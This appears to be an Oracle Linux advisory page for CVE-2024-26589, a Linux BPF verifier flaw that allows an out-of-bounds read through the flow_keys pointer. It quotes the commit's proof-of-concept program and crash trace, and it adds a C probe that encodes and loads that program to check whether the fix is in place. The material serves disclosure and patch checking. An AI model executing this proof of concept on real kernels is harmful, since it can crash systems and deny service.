CVE-2024-26589

CVE Details

Release Date: 2024-02-22

Description


In the Linux kernel, the following vulnerability has been resolved:

bpf: Reject variable offset alu on PTR_TO_FLOW_KEYS

For PTR_TO_FLOW_KEYS, check_flow_keys_access() only uses fixed off
for validation. However, variable offset ptr alu is not prohibited
for this ptr kind. So the variable offset is not checked.

The following prog is accepted:

func#0 @0
0: R1=ctx() R10=fp0
0: (bf) r6 = r1 ; R1=ctx() R6_w=ctx()
1: (79) r7 = *(u64 *)(r6 +144) ; R6_w=ctx() R7_w=flow_keys()
2: (b7) r8 = 1024 ; R8_w=1024
3: (37) r8 /= 1 ; R8_w=scalar()
4: (57) r8 &= 1024 ; R8_w=scalar(smin=smin32=0,
smax=umax=smax32=umax32=1024,var_off=(0x0; 0x400))
5: (0f) r7 += r8
mark_precise: frame0: last_idx 5 first_idx 0 subseq_idx -1
mark_precise: frame0: regs=r8 stack= before 4: (57) r8 &= 1024
mark_precise: frame0: regs=r8 stack= before 3: (37) r8 /= 1
mark_precise: frame0: regs=r8 stack= before 2: (b7) r8 = 1024
6: R7_w=flow_keys(smin=smin32=0,smax=umax=smax32=umax32=1024,var_off
=(0x0; 0x400)) R8_w=scalar(smin=smin32=0,smax=umax=smax32=umax32=1024,
var_off=(0x0; 0x400))
6: (79) r0 = *(u64 *)(r7 +0) ; R0_w=scalar()
7: (95) exit

This prog loads flow_keys to r7, and adds the variable offset r8
to r7, and finally causes out-of-bounds access:

BUG: unable to handle page fault for address: ffffc90014c80038
[...]
Call Trace:

 bpf_dispatcher_nop_func include/linux/bpf.h:1231 [inline]
 __bpf_prog_run include/linux/filter.h:651 [inline]
 bpf_prog_run include/linux/filter.h:658 [inline]
 bpf_prog_run_pin_on_cpu include/linux/filter.h:675 [inline]
 bpf_flow_dissect+0x15f/0x350 net/core/flow_dissector.c:991
 bpf_prog_test_run_flow_dissector+0x39d/0x620 net/bpf/test_run.c:1359
 bpf_prog_test_run kernel/bpf/syscall.c:4107 [inline]
 __sys_bpf+0xf8f/0x4560 kernel/bpf/syscall.c:5475
 __do_sys_bpf kernel/bpf/syscall.c:5561 [inline]
 __se_sys_bpf kernel/bpf/syscall.c:5559 [inline]
 __x64_sys_bpf+0x73/0xb0 kernel/bpf/syscall.c:5559
 do_syscall_x64 arch/x86/entry/common.c:52 [inline]
 do_syscall_64+0x3f/0x110 arch/x86/entry/common.c:83
 entry_SYSCALL_64_after_hwframe+0x63/0x6b

Fix this by rejecting ptr alu with variable offset on flow_keys.
Applying the patch rejects the program with 'R7 pointer arithmetic
on flow_keys prohibited'.
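The verifier listing above gives the complete eight-instruction flow-dissector program, so the fix can be checked on a running kernel without guessing at anything: encode exactly those instructions and submit them with BPF_PROG_LOAD, then read the verifier log. The program is only loaded here, never executed with BPF_PROG_TEST_RUN, because on an unpatched kernel the page shows that running it page-faults. This is an added example, not code from the kernel commit or from Oracle; it assumes a Linux system with the UAPI headers installed and a process holding CAP_BPF or CAP_SYS_ADMIN (flow-dissector programs cannot be loaded unprivileged). The context offset 144 is taken from the listing (`r6 +144`, the flow_keys field of __sk_buff); the verdict names and the probe_verifier()/insn_at() helpers are this example's own.

```c
/* Added example for CVE-2024-26589 (not from the kernel commit or the Oracle
 * page): encode the program from the verifier log and ask the running kernel's
 * verifier whether it accepts a variable offset on PTR_TO_FLOW_KEYS.
 * Load only; the program is never run. Needs CAP_BPF or CAP_SYS_ADMIN. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/bpf.h>

#define FLOW_KEYS_CTX_OFF 144   /* "r6 +144" in the listing: __sk_buff.flow_keys */
#define PROG_LEN 8

/* Fill insns[] with the eight instructions from the verifier log; returns count. */
static size_t build_prog(struct bpf_insn *insns)
{
    const struct bpf_insn prog[PROG_LEN] = {
        /* 0: (bf) r6 = r1                 ctx pointer */
        { .code = BPF_ALU64 | BPF_MOV | BPF_X, .dst_reg = BPF_REG_6, .src_reg = BPF_REG_1 },
        /* 1: (79) r7 = *(u64 *)(r6 +144)  r7 becomes PTR_TO_FLOW_KEYS */
        { .code = BPF_LDX | BPF_MEM | BPF_DW, .dst_reg = BPF_REG_7, .src_reg = BPF_REG_6,
          .off = FLOW_KEYS_CTX_OFF },
        /* 2: (b7) r8 = 1024 */
        { .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_8, .imm = 1024 },
        /* 3: (37) r8 /= 1                 verifier drops the constant: scalar() */
        { .code = BPF_ALU64 | BPF_DIV | BPF_K, .dst_reg = BPF_REG_8, .imm = 1 },
        /* 4: (57) r8 &= 1024              bounded unknown in [0, 1024] */
        { .code = BPF_ALU64 | BPF_AND | BPF_K, .dst_reg = BPF_REG_8, .imm = 1024 },
        /* 5: (0f) r7 += r8                variable offset on flow_keys: the bug */
        { .code = BPF_ALU64 | BPF_ADD | BPF_X, .dst_reg = BPF_REG_7, .src_reg = BPF_REG_8 },
        /* 6: (79) r0 = *(u64 *)(r7 +0)    out-of-bounds read on an unfixed kernel */
        { .code = BPF_LDX | BPF_MEM | BPF_DW, .dst_reg = BPF_REG_0, .src_reg = BPF_REG_7 },
        /* 7: (95) exit */
        { .code = BPF_JMP | BPF_EXIT },
    };
    memcpy(insns, prog, sizeof prog);
    return PROG_LEN;
}

/* Instruction i of the program, for comparison against the listing's opcodes. */
static struct bpf_insn insn_at(size_t i)
{
    struct bpf_insn insns[PROG_LEN];
    struct bpf_insn zero = { 0 };
    size_t n = build_prog(insns);
    return i < n ? insns[i] : zero;
}

enum verdict {
    VERDICT_REJECTED_FIXED,       /* log carries "pointer arithmetic on flow_keys prohibited" */
    VERDICT_ACCEPTED_VULNERABLE,  /* verifier accepted the program, as in the listing */
    VERDICT_REJECTED_OTHER,       /* rejected, but not by the flow_keys check */
    VERDICT_INCONCLUSIVE          /* EPERM/ENOSYS: no privilege or no bpf() */
};

/* Submit the program to the verifier via BPF_PROG_LOAD (no BPF_PROG_TEST_RUN). */
static enum verdict probe_verifier(char *log, size_t log_sz)
{
    struct bpf_insn insns[PROG_LEN];
    union bpf_attr attr;
    int fd;

    log[0] = '\0';
    memset(&attr, 0, sizeof attr);
    attr.prog_type = BPF_PROG_TYPE_FLOW_DISSECTOR;
    attr.insn_cnt  = (uint32_t)build_prog(insns);
    attr.insns     = (uintptr_t)insns;
    attr.license   = (uintptr_t)"GPL";
    attr.log_level = 1;                 /* ask for the verifier's reasoning */
    attr.log_size  = (uint32_t)log_sz;
    attr.log_buf   = (uintptr_t)log;

    fd = (int)syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof attr);
    if (fd >= 0) {
        close(fd);                      /* loaded fine: the variable offset was not rejected */
        return VERDICT_ACCEPTED_VULNERABLE;
    }
    if (errno == EPERM || errno == ENOSYS)
        return VERDICT_INCONCLUSIVE;
    if (strstr(log, "pointer arithmetic on flow_keys prohibited"))
        return VERDICT_REJECTED_FIXED;
    return VERDICT_REJECTED_OTHER;
}

int main(void)
{
    static char log[1 << 16];
    static const char *names[] = {
        "REJECTED: fix present",
        "ACCEPTED: verifier still allows a variable offset on flow_keys",
        "REJECTED for another reason (see log)",
        "INCONCLUSIVE: need CAP_BPF/CAP_SYS_ADMIN, or bpf() unavailable",
    };
    enum verdict v = probe_verifier(log, sizeof log);
    int err = errno;

    printf("verdict: %s\n", names[v]);
    if (v == VERDICT_INCONCLUSIVE)
        printf("bpf(): %s\n", strerror(err));
    else if (v != VERDICT_ACCEPTED_VULNERABLE)
        printf("verifier log:\n%s\n", log);
    return v == VERDICT_REJECTED_FIXED ? 0 : 1;
}
```

Run it as root on the host under test; exit status 0 means the verifier answered with the same "pointer arithmetic on flow_keys prohibited" message the commit message quotes. An ACCEPTED verdict means the load succeeded and the kernel still has the unchecked variable offset; do not follow it with a test run of the program, since that is the path in the page's call trace. On Oracle Linux 9 the errata table below names the kernel update that carries the fix.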

See more information about CVE-2024-26589 from MITRE CVE dictionary and NIST NVD


CVSS Scoring


NOTE: The following CVSS v3.1 metrics and score provided are preliminary and subject to review.

Base Score: 4.1
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H

Attack Vector: Local
Attack Complexity: High
Privileges Required: High
User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: High

Errata information


Platform                            Errata            Release Date
Oracle Linux version 9 (kernel)     ELSA-2024-9315    2024-11-14


This page is generated automatically and has not been checked for errors or omissions. For clarification or corrections:
